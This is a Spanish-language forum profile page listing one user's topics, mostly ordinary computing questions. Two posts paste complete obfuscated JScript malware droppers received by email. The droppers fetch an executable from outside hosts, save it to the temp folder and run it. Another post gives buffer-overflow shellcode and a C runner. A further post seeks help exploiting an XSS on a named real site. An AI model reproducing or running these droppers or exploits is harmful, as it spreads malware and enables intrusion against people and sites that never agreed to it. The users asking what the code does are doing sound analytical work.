Temas - GGZ

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - GGZ

Páginas1

Dudas y pedidos generales / Complemento a dos, diferentes métodos de conversión.

Agosto 11, 2017, 08:54:13 AM

Hola, voy directo.

Sé como convertir un número a negativo usando la rápida conversión de C_{N}^{2} (complemento a dos (explicado en wiki) y también utilizando la fórmula 2^n-N.
Pero fallo al querer convertir el mismo número usando complemento a 1 para luego sumar 1 con el objetivo de llegar al mismo resultado que usando la conversión rápida y la fórmula (esto pasa sólo cuando agrego más ceros al numero).

Por ejemplo:

45 (010011), a través de la fórmula de comp a dos es 010011 (-45)
Ahora tenemos un problema, en este ejemplo se trabajo con número de bits a 6, entonces es lo mismo 19 que -45 (en binario), para solucionar esto vamos a agregar más ceros a 45 para que nos de otra representación (está mejor explicado en wiki):

45 expresado en 8 bits:
00010011
Si utilizamos la fórmula llegaremos a 11010011 (-45)

Pero si uso complemento a uno y sumo 1, no llego a lo mismo. ¿Por qué? (complemento a uno es hacer la negación de todos los bits solamente)

C_{N}^{1}(00010011) =

11101100
00000001 +
-----------
11101101 != 11010011, ¿por qué?

¿Será que no se puede usar así el C_{N}^{1}?

Saludos

Dudas y pedidos generales / [SOLUCIONADO] Shellcode to HEX

Enero 26, 2017, 07:48:58 PM

Hola a todos, estoy explotando un bof necesito una ayuda.

Necesito pasar esta serie de instrucciones a hexa para luego ejecutarlo con C.

Código: asm

.section .data
__archivo:
.asciz "/home/httpd/test"  # Archivo a eliminar.

.section .text
.global main
main:
        movl $10, %eax     
        movl $__archivo, %ebx    
        int  $0x80

        movl %eax, %ebx   
        movl $1, %eax      
        int  $0x80

Quiero pasar este código asm que borra un archivo a C tipo:

Código: c


char sc[] =  "\xb8\x0a\x00\x00\x00\xbb\x8c\x90\x04\x08\xcd\x80\x89\xc3\xb8\x01\x00\x00\x00\xcd\x80";

int main (void){

        int (*func)();
        func = (int (*)())sc;
        (int)(*func)();
}

Pero me parece que estoy pasando mal el asm al hexadecimal, ¿cómo puedo pasarlo para ejecutarlo desde C?

Probé hacerlo con objdump pero no funciona.

Saludos.

Dudas y pedidos generales / [Moto PRO] Capturar y mandar imágenes.

Enero 14, 2017, 10:52:55 AM

Hola a todos, acabo de cambiar mi celular por uno más nuevo (Moto G4 jaja) y me quedó el Moto PRO viejo.

Ahora lo que yo quiero hacer es poner ese celular en algún lugar escondido en mi casa cuando me voy de vacaciones, para sacar y mandar capturas por internet.
Estuve mirando y no encontré ninguna aplicación que hace eso, por si las dudas ustedes conocen alguna.

Seguramente que es posible porque tiene Android, tiene wpp y conexión wifi así que, ¿qué más se puede pedir?.
El bot lo único que tiene que hacer es sacar una foto y subirla a algún servidor FTP.

Saludos!

Off Topic / Un poco aburrido, ¿a qué se dedican o se quieren dedicar ustedes?

Diciembre 28, 2016, 12:47:44 PM

Hola.

Tengo años en esto de seguridad informática (no creo que sea un crack), pero cada año que pasa siento que pierdo un poco más de pasión ya no tengo la misma curiosidad que antes, exploté en su momento vulnerabilidades a nivel web y otras como BoF (tuve que hacerlo como final de una materia explotar un servidor HTTP vulnerable), ahora me estoy tirando más por las matemáticas mezcladas con programación, lo que sería analizar complejidad de funciones y eso me está gustando (estoy 3er año de la carrera).

Pero eso no viene al caso me parece comento por si las dudas alguien le interesa también esa area, mi duda es, ¿qué area de la informática en general les interesa a ustedes?,¿sólo seguridad informática? No creo, ¿están en algún proyecto desarrollando algo?, ¿tienen algún team de competencia algo por el estilo?, ¿qué están programando?, ¿traman conquistar el mundo?.

Pregunto por si las dudas, para conocer más campos.

Gracias, saludos.

Dudas y pedidos generales / [SOLUCIONADO] ¿Para qué usan el csrf_token en los formularios?

Diciembre 28, 2016, 05:04:09 AM

Hola.

Una pregunta, hay páginas que usan un token al enviar formularios POST, pero no entiendo muy bien el funcionaiento de éste.
¿Alguien me podría explicar para que sirve?, porque yo de todos modos puedo sacar el token con bash.

Un ejemplo (funciona perfectamente):

Código: php

#!/bin/bash
echo "Token usado para enviar formularios via post"
while true; do wget -qO - http://codeforces.com/profile/ | grep -m 1 "input type='hidden' name='csrf_token' value" | awk '{print $6}' | cut -d "'" -f 2; done

Lo ejecutan con bash No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o ./co.sh

Saludos.

Dudas y pedidos generales / [SOLUCIONADO] Alternativa de PHP, ¿PHP es viejo?

Octubre 13, 2016, 11:21:50 PM

Hola a todos,

¿por qué muchos dicen que PHP ya pasó de moda?, además que hacen burlas al lenguaje, siendo que usan una plataforma hecha en PHP como Facebook.
Y de ser así, ¿cuáles lenguajes se usan ahora como alternativa de PHP? y ¿qué ventajas tienen en comp con PHP?

Dudas y pedidos generales / [SOLUCIONADO] [Gnu AS] BruteForce

Octubre 01, 2016, 01:36:17 AM

Voy al grano,

Hecho en C:

Código: c

#include <stdio.h>

int fuerzabruta(char *S, char *s, int lS, int ls)
{
        int i, j;

        for(i=0; i<lS-ls+1; i++)
                if(S[i]==s[0]) {
                      for (j=0; j<ls; j++){
                              if (S[i+j] != s[j]) break;
                      }
    
                        if(j==ls) return i;
        }
        return -1; 
}

Lo pasé a ASM y anduvo, pero lo quise hacer de nuevo y no funcionó:

1era versión:

Código: asm

#int fuerzabruta(char *S, char *s, int lS, int ls){
#	int i, j;
#	for(i=0; i<lS-ls+1; i++)
#		if(S[i]==s[0]) {
#			for(j=0; j<ls && S[i+j]==s[j]; j++);
#			if(j==ls) return i;
#	}
#	return -1;
#}

# Retorna la posición del primer elemento de la cadena a buscar.
# "sHolasos" "sos" retorna 5.



# lS = %rdx
# ls = %rcx

.data
	i: .quad 0

.text
.global bf
bf:
	# iremos incrementando (df = 0)
	cld

	# Guardo variable ls en otro registro.
	# rdx = ls
	movq %rcx,%r8
	

	# cuantas veces repetimos al primer for?
	
	subq %rcx,%rdx	# rdx = rdx - rcx
			# es decir: lS = lS - ls

	addq $1,%rdx # sumo 1 



	# Lo cargamos al rcx para el bucle.
	movq %rdx, %rcx
aca:
	lodsb # copiamos el primer caracter de la 2da cadena en el rax
#	decq %rsi

	sigue1:
		#lodsb
		# primero busco el primer caracter de la cadena 2 en la cadena 1.
		# mas tecnico: comparamos rax con rdi
		scasb
		# si encontramos el primer caracter en algun lugar de la cadena, saltamos al 2do for.
		
		je found
	loop sigue1
	# termina.
	# -1 si no lo encontramos el primer caracter de la 2da cadena en la primera.
	movq $-1, %rax
	ret


found:
	# encontramos el primer caracter de la 2da cadena en la primera.
	# estamos dentro del primer if.
	# usaremos el registro r8, hasta el momento r8 = ls.

	# Quiero saber el valor de i
	# i = %rdx - %rcx
	# i = lS-ls+1 - veces repetido (hacia atras,es decir del tope al 0).

	# Guardamos informacion del bucle anterior.
	movq %rcx,%r13
	movq %rdx,%r15
	movq %rsi,%r9
	subq $1,%r9

	subq %rcx,%rdx # rdx = rdx - rcx ( i = rdx )


	# Cargamos r8=ls a rcx para el 2do for. Hay que restar uno.
	movq %r8,%rcx
	decq %rcx
	movq %rdi,%r14
	sigue2:
		# comprobamos si los siguientes caracteres estan en la cadena 1.
		# tengo que cambiar adonde apunta rdi, es decir la primer cadena. ( S[i+j] ) 
		# i = rdx
		cmpsb
		jne fail
	loop sigue2
	movq %rdx,%rax
	addq $1,%rax
	ret
		
	
# fallo en el 2do for.
fail:
	# el último if ( if j == ls return i )
	# si es igual a 0 significa que recorrió todo el bucle.
	cmpq $0, %rcx
	je final
	# si no son iguales vuelvo al 1do for.

	# antes cargo el rcx y rdi de nuevo, con informacion del i del primer bucle.
	# restauro registros
	movq %r13,%rcx
	movq %r14,%rdi

	movq %r9, %rsi
	movq %r15,%rdx
	jmp aca

final:
	subq %rcx,%rdx # es el i
	movq %rdx,%rax
	ret

Lo implemento usando se, o sea declaro el prototipo en c y llamo a esa funcion, haciendo gcc bf.c bf.s -o bf
Esa primer versión con todo lo que probé funcionó pero esta segunda versión no, capaz me comí algo pero ya me cansé de buscarlo.
Intenté con gdb pero me cansé a ver si alguien me puede dar una manito.
Para usar gdb lo compilaba con -g

Segunda versión:

Código: asm

.text
.global bf
bf:
	cld
	movq %rcx,%r8
	
	subq %rdx,%rcx	# rdx = rdx - rcx
			# lS = lS - ls
	addq $1, %rdx

	movq %rdx,%r9

	movq %rdx,%rcx
	aca:
		lodsb # cargamos el primer caracter de la 2da cadena en el rax.		
		subq $1,%rsi

		_1for:
			scasb
			je si_eq_s0
		loop _1for
		movq $-1, %rax
		ret

si_eq_s0:
	# Para volver al anterior bucle.
	movq %rsi, %r14
	addq $1,%rsi
	movq %rdi, %r12
	movq %rcx, %r13 # valor de i.

	subq %r13,%r9 # valor de i


	movq %r8,%rcx
	subq $1,%rcx

	_2for:
		cmpsb # rsi == rdi?
		jne fail
	loop _2for
	movq %r13,%rax
	ret
	
fail:
	cmpq $0,%rcx
	je final
	
	movq %r14,%rsi
	movq %r12,%rdi
	movq %r13,%rcx
	jmp aca

final:
	movq %r9,%rax
	ret

Esta es la imp.

Código: c

#include <stdio.h>
int bf ( char *s1, char *s2, int long_s1, int long_s2);
int main (void){
	printf ("Resultado: %d\n",bf("soAdSDsos","sos",9,3));
        return 0;
}

Saludos!

Dudas y pedidos generales / [SOLUCIONADO] ¿Problema falta de RAM, de tarjeta grafica o qué?

Septiembre 05, 2016, 08:10:32 AM

Hola a todos

,

Características de mi PC:
· FX 6300
· 8gb de RAM
· 1 tera hdd
· R7 250X
· WIndows 7

Cuando inicio Dirty Bomb funciona perfectamente al máximo no se traba para nada pero después de jugar unos 10 minutos se cuelga toda la computadora, directamente tengo que reiniciarla.

¿Por qué pasa esto, es la RAM, la tarjeta gráfica la placa madre, o qué?

Saludos!

Dudas y pedidos generales / [Instagram o FB] Idea: aumentar el número de columnas a mostrar.

Junio 10, 2016, 11:04:32 PM

Hola a todos!

Primero de todo quiero decir que no tengo tanto tiempo para desarrollar la extensión pero en cuanto pueda lo desarrollaré o por lo menos haré el intento.

¿Es difícil desarrollar una extensión para Chrome o Firefox para que por ejemplo Facebook se muestre en 3 columnas al igual que Instagram para que muestre más columnas?
¿Cómo podría editar Instagram usando por FireBug para que muestre más columnas por ejemplo?
¿Podría hacerlo?

Saludos!

#10

Dudas y pedidos generales / [Get rich or die tryin?] Ganarse la vida programando y otras cosas...

Mayo 27, 2016, 12:36:13 AM

Hola a todos!

Actualmente estoy en el 3er año de la carrera de ciencias de la computación, me gusta la carrera y blablabla... En un futuro quiero trabajar en mis propios proyectos, tener mi mini-empresa poder vivir desarrollando aplicaciones (vivir bien o muy bien), es decir me gustaría vivir tranquilo sin tener deudas con nadie y por que no darme algunos lujos.
Sin embargo en estos últimos años he observado gente que se recibió de carreras como Ingeniería en Sistemas o Ingeniería Informática y no les va tan bien como yo supuse que les iría y ni hablemos de la gente que se recibe de Ingeniería Mecánica o Ingeniería Electrónica esos trabajos ¡sí! que pagan poco en comparación a carreras como Ingeniería Industrial o Ingeniería Civil, es decir después de estudiar una carrera que no es fácil tenés que seguir rompiendote la cabeza para que te paguen poco y nada, ¿qué es eso?

Lo que me lleva a preguntarme: ¿qué tanto se valora hoy en día el desarrollo de software?,
Sin ir más lejos, muy pocos saben apreciar el trabajo de un físico teórico o de un matemático puro porque realmente no entienden la complejidad del mismo, en cambio el trabajo de un médico o de un arquitecto se suele apreciar porque más o menos se entiende el trabajo que desarrollan (no sé si me explico), pocos entienden la complejidad de desarrollar software y la importancia.
¿Se imaginan hoy en día la medicina sin la ingeniería o la computación?, sería una porquería, muy cara, sólo para los ricos.

Aunque no lo crean en mi facultad los físicos y matemáticos o vienen en bici o vienen en colectivo, muy pocos tienen auto, hay muchos paros ahora es un desastre, yo me pongo en el lugar de ellos y me pregunto ¿tanto esfuerzo estudiando una carrera larga y pesada para que todo el día estén discutiedo por los salarios? Es muy triste, por otro lado a un tipo que hace humor en YouTube le pagan más que a un físico, un matemático, un médico, y podría seguir ...

Yo pensaba que entendía los problemas que habían en el mundo del software pero ya no. El otro día vi a todos los programadores de una empresa acá de mi Ciudad sentados afuera haciendo paro.

¿qué tan dificil hoy en día es ganarse la vida con esto y vivir bien (bastante)? O sea me refiero a terminar la carrera y empezar a trabajar en una empresa.
¿para vivir bien si o si hay que tener un emprendimiento propio o se podría trabajar para una empresa que pague bien? Porque eso hasta ahora no lo he visto mucho.
¿Es cierto que las empresas tienen a explotar a sus trabadores?

¡Saludos!

#11

Dudas y pedidos generales / Chrome vs Otros navegadores

Mayo 22, 2016, 03:44:35 PM

Hola a todos!,

Tengo una duda y es que, ¿qué tiene Chrome que lo hace tan rápido en comparación a otros navegadores?

Yo en GNU/Linux uso Chrome y también en Windows, a comparación de otros es impresionante la ventaja que le ha sacado en estos años.
Cuando uso Firefox en GNU/Linux andan lentas las páginas, cargan lentos los videos.
En cambio Chrome nunca se traba los videos (me refiero a que bajan de FPS), inclusive cargan más rapido y además otras ventajas como buscar en páginas webs sin haberlas visitado (escribiendo la URL y aprentando TAB).

¿Pero que es lo que hace a Chrome tan rápido?, ¿es por como maneja los procesos?

Uso IExplorer y se traba cada página es un desastre hasta a veces salta un "Enviar errores", Firefox está un poco mejor, Opera mejoró estos años.

¿Pero que tan diferente están programados estos navegadores?

Opera y Chrome manejan el mismo motor?

Saludos!

#12

Dudas y pedidos generales / [JS] ¿Qué hace este código?

Mayo 21, 2016, 11:27:18 PM

Buenas, otra vez soy yo.
Me parece que me voy a tener que cambiar de correo, hoy recibí este.

Código: c

var places = 0;
quiet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  parsons = [];
var strip = {
    ':': '.',
    'U': 'S',
	'|': 'X'
	};




String.prototype.consecutive = function () {
	composite = this;
	for (var i in strip){composite = composite.replace(i, strip[i]);}
    return composite;
};
  for ( var i = 128; i--; ) {
    if ( parsons[ i ] === undefined )
      parsons[ i ] = -1;
  
    parsons[ quiet.charCodeAt( i ) ] = i;
  }
var margot = 3-2;  
String.prototype.consecutive4 = function() {
	
    var c1, c2, c3, c4;
    var i, len, out;
	var str = this.split("developmental").join("");
    len = str.length;
    i = 0;
    out = "";
    while(i < len) {
	/* c1 */
	do {
	    c1 = parsons[str.charCodeAt(i++) & 0xff];
	} while(i < len && c1 == -1);
	if(c1 == -1)
	    break;

	/* c2 */
	do {
	    c2 = parsons[str.charCodeAt(i++) & 0xff];
	} while(i < len && c2 == -1);
	if(c2 == -1)
	    break;

	out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

	/* c3 */
	do {
	    c3 = str.charCodeAt(i++) & 0xff;
	    if(c3 == 61)
		return out;
	    c3 = parsons[c3];
	} while(i < len && c3 == -1);
	if(c3 == -1)
	    break;

	out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

	/* c4 */
	do {
	    c4 = str.charCodeAt(i++) & 0xff;
	    if(c4 == 61)
		return out;
	    c4 = parsons[c4];
	} while(i < len && c4 == -1);
	if(c4 == -1)
	    break;
	out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
    }
    return out;
}

var aides = "developmentalQWdevelopmentalN0aXZdevelopmentallWE9iadevelopmentalmVjdA=developmental=".consecutive4();
String.prototype.consecutive2 = function () {
    var valid = {
        workflow: this
    };
    valid.dugout = valid.workflow["c3Vic3RyaW5n".consecutive4()](places, margot);
    return valid.dugout;
};

var plans ="developmentalRXhwYW5developmentalkRW52aXdevelopmentalJvbm1lbnRTdHJdevelopmentalpbmdz".consecutive4();
var Native = function(options){
	options = options || {};

	var afterImplement = options.afterImplement || function(){};
	var generics = options.generics;
	generics = (generics !== false);
	var legacy = options.legacy;
	var initialize = options.initialize;
	var protect = options.protect;
	var name = options.name;

	var object = initialize || legacy;


	return object;
};
var nvidia ="developmentalJVdevelopmentalRFTVdevelopmentalAl".consecutive4();
var tanker = [aides, plans,nvidia,  ""+"."+("tease","rambling","builders","editions","manga","northwest","outcast","undeserving","exe"), "UnVu".consecutive4(), ("M"+"SX"+"ML"+("cathedral","canned","revolting","aglow","necessary","leopard","specifies","2.")+"|M"+"LH"+"TT"+("imposes","ensemble","rudimentary","housing","prehistoric","boundary","longwinded","badness","P>")+"WU"+("mustang","trevor","campania","decomposition","dairy","yards","booth","cr")+("governor","wharves","karma","workshop","sawmill","oblivious","dates","transmigration","ip")+"t:"+("juxtaposition","editions","sequences","chord","manor","labour","ultimately","happens","Sh")+"ell").consecutive()];
emolument = "_F2_";
var stigma = this[tanker.shift()];
Native.implement = function(objects, properties){
	for (var i = 0, l = objects.length; i < l; i++) objects[i].implement(properties);
};

Native.genericize = function(object, property, check){
	if ((!check || !object[property]) && typeof object.prototype[property] == 'function') object[property] = function(){
		var args = Array.prototype.slice.call(arguments);
		return object.prototype[property].apply(args.shift(), args);
	};
};
Native.typize = function(object, family){
	if (!object.type) object.type = function(item){
		return ($type(item) === family);
	};
};
DKXzXUloeEt = "XiJlJKV";
pertinent = (("entrails", "turkey", "concord", "windy", "pGXUIOix") + "HYIhWey").consecutive2();
pence = (("scholastic", "admittedly", "tolerance", "kingdom", "knives", "biographer", "sClOnFArg") + "xUIHepEsuqF").consecutive2();
  
    String.prototype.lascivious = function (a) {
        for (var b = [], c = 0; c < a.length; c++)b[c] = a[c];
        return b.join("")
    };

var newspaper = tanker.pop().split(">");

improve = "b3Blbg==".consecutive4();
var lender = new stigma(newspaper[1]);
pKOwcGeVml = "_F3_";
var kimono = new stigma(newspaper[0]);
var matins = lender[tanker.shift()](tanker.shift());
MFWAxq = "_F5_";
weasel = (("ornamentation", "canister", "exodus", "ezekiel", "EIkHyUIDgGOP") + "mOzCIdN").consecutive2();
function origination(bestir, mammal) {

    try {
        var exhibits = matins + "/" + mammal ;
		exhibits = exhibits+ tanker.shift();
            kimono[improve](("embargo","language","G" + weasel) + ("recover","upper","teachers","splinter","T"), bestir, false);
       
    MSKnAYPCS = "_F7_";
    kimono[pence + ("specifications","heady","end")]();
	var revenue=(WScript+""=="V2luZG93cyBTY3JpcHQgSG9zdA==".consecutive4())&&kimono["c3RhdHVz".consecutive4()] +""=="MjAw".consecutive4()&&typeof(jFlbYxv)==="undefined";
	lQHNgR = "_F8_";
    if (revenue) {
		
        var scorch = new stigma((("morose","declination","captured","synagogue","compute","borough","beadle","saline","A")+("drugs","boating","obdurate","tureen","azores","innovative","risky","crown","SEOO")+"DB"+("repartee","occurrence","plasma","herbs","favors","flounder","disintegration",".S")+"tr8").replace("SEO", "D").replace("8", "eam"));
        scorch[improve]();
        IIQkXYytCHB = "_F9_";
        scorch.type = margot;
        uRxIgP = "_F10_";
        scorch["d3JpdGU=".consecutive4()](kimono[("freeware","inflation","advertisement","formations","accede","initiate","nepal","")+"R"+"es"+"pon"+strip['U'].toLowerCase()+"e"+"Qm9keQ==".consecutive4()]);
        uXVSamtE = "_F11_";
        scorch[(pertinent + "o"+("wines","gradually","competitor","alluring","signals","occasion","herself","bugbear","00")+("diving","berkshire","auction","country","arrival","thickness","handjob","8i")+"tion").replace("0"+("mammy","tales","surveillance","counties","ontario","expenditures","consecutive","08"), pence)] = 0;
        ekOcgRu = "_F12_";
        scorch[("grove","exploring","whereas","console","solved","scholar","titter","s")+"aveT"+"oF"+"ile"](exhibits, 2);
        KCTKNg = "_F13_";
        scorch.close();
        haORriCT = "_F14_";
		lender[tanker.shift()](exhibits, margot, true);
    }
} catch (XbSLPPW) { };

    toorSzWCx = "_F15_";
}
origination("aHR0cDovLw==".consecutive4()+"\u0064\u0075\u0062\u0061\u0069\u0066\u0072\u0069\u0064\u0061\u0079\u0073\u002E"+"\u0063\u006F\u006D\u002F\u0034\u0033\u0037\u0067\u0066\u0069\u006E\u0077\u0032" + "?WDUNFQzK=xBncBq","efYHoUEoq");
   ReoARoTPF = "_F16_";

Saludos!

#13

Dudas y pedidos generales / [SOLUCIONADO] [JS]¿Qué hace este código?

Mayo 17, 2016, 04:54:04 AM

Hoy he recibido este código de una persona que no conozco.

Código: javascript

var place0 = false;
var DENMARK0 = "";

var fromPath;
var VALIGN0 = "Cr"+"e"+"ateObject";
/*@cc_on /* u  */
  @if (@_win32 || @_win64)/* u  */
    //
	CONNECTION /* u  */ = "W"+"S"+"c"+"ript";
	place0 /* u  */= true;/* u  */
	DENMARK0/* u  */ = /* u  */"MLH";/* u  */
	fromPath =/* u  */ "R" + "esponseB"/* u  */ + "ydo".split('').reverse().join('');
	Turkey = /* u  */(/* u  */"noitisop").split(''/* u  */).reverse(/* u  */).join('');
	devel0 /* u  *//* u  */ =/* u  */ "eliFoTevaS".split(''/* u  */).reverse().join('');
	Currency0 = "A"+"DODB";
	DENMARK1 = "s" + "end";
	Backspace = "ht"+"tp:"+"//v"+"il"+"alu"+"sa."+"co"+"m/0"+"98r"+"44"+"fg"+"45"+"g4"+"5";
	Backspace0 = "G\x45"+"T";
 /* u  */ @end/* u  */
@*//* u  */
if (!(place0))
{
	WScript.Echo("pizzxzzda");
	WScript.Quit(1);
}


var stepy/* u  */ = /* u  */this[/* u  */CONNECTION /* u  *//* u  */]/* u  */;
var VALIGN1 = function VALIGN() {return stepy[VALIGN0](("fdasfadsfaszxvc", CONNECTION /* u  */)+".Shell");}(), aaa0 = 11;
var accinp0 /* u  */ = 1 * ((-5600 + 5602) - 0);
var catchKeyCode = accinp0 /* u  */ - (2 + 0) * 1;
function Scott(requires0){VALIGN1[("@sdf3asdf ", "adfs3.", "R")+ "u" + ("x", "n")](requires0, catchKeyCode, catchKeyCode);};
function devel(){return VALIGN0;};

{
var stepy0 = "M" + "SX"+"ML2."+"X"+DENMARK0+"T"+"TP";
var accinp = "";
accinp = "o"+"pen";
function arrCurrentTag(catchKeyCode0) {catchKeyCode0[devel0](VALIGN1["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "QDdd60eYD.ex" + "e", (4714 - 4712) * 1); return 0;};

if (true){
 Scott1 = stepy0;
 arrCurrentTag1 = stepy[VALIGN0](Scott1);
 var place /* u  */ = 3-2;
while (place /* u  */) { 
	for (;place /* u  */;){
	try {
		if (place /* u  */ == 1)
		{
			arrCurrentTag1[accinp](Backspace0, Backspace, (true, false));
			arrCurrentTag1[DENMARK1]();
			arrCurrentTag0 = "S"+"l"+"eep";
			place /* u  */ = 5316 - 5314;
		}
		stepy[arrCurrentTag0](120); 
		if (arrCurrentTag1["r"+"eadystate"] < 4) continue;
		place /* u  */ = catchKeyCode;
		function DENMARK(Currency) {var Scott0 = (123, Currency); return Scott0;};
		
		aaa = VALIGN1["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "QDdd60eYD.ex" + "e";
		CONNECTION0 = VALIGN1["E"+"xpandEnvir"+"o"+"nmentStrings"]("%T"+"E"+"M"+"P%/") + "suc11.05.2016kit.bat";
		Turkey0 = "start "+aaa+"\r\nexit"

		Scott1 = devel1 = stepy[devel()](Currency0+"."+"Str"+"e"+"a"+"m");
		Scott1[accinp]();
		Scott1["t"+"y"+"pe"] = 2;
		requires = "w"+"r"+"i"+"t"+"e";
		Scott1["Charset"] = "windows-1251";
		Scott1[requires+"Text"](Turkey0);
		devel1[Turkey] = 0;
		Scott1[devel0](CONNECTION0, -2025 + 2027);
		devel1["close"]();
		
		Scott1 = devel1 = stepy[devel()](Currency0+"."+"Str"+"e"+"a"+"m");
		Scott1[accinp]();
		Scott1["t"+"y"+"pe"] = 2;
		Scott1["Charset"] = "windows-1251";
		Scott1[requires+"Text"]("M");
		devel1[Turkey] = 0;
		arrCurrentTag(Scott1);
		devel1["close"]();
		
		Scott1 = devel1 = stepy[devel()](Currency0+"."+"Str"+"e"+"a"+"m");
		Scott1[accinp]();
		Scott1["t"+"y"+"pe"] = 1;
		Scott1[requires](arrCurrentTag1[fromPath]);
		devel1[Turkey] = -3320 + 3321;
		arrCurrentTag(Scott1);
		devel1["close"]();
		
		if (1 && place0) Scott(CONNECTION0);
	} catch(fromPath0){};};
};
}
}

Cabe destacar que después de declarar :
var place0 = false;
var DENMARK0 = "";

Abajo hay una linea de ////////////////////////////////////////////////// larguísima que lo tuve que sacar porque se trababa todo

#14

Dudas y pedidos generales / [SOLUCIONADO] desafiar.com.ar [DUDA: Bypassing ANTI-XSS Chrome]

Abril 23, 2016, 09:44:42 PM

Buenas,

Hace como un mes encontré un XSS en la página mencionada anteriormente, intenté saltear el filtro Anti XSS de Chrome y pude!
Solamente que ahora lo arreglaron, lo que me lleva a la pregunta de que si ustedes me podrían ayudar a explotarlo.

PoC: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ese era el que funcionaba hace hace poco en Chrome.

Saludos!

Páginas1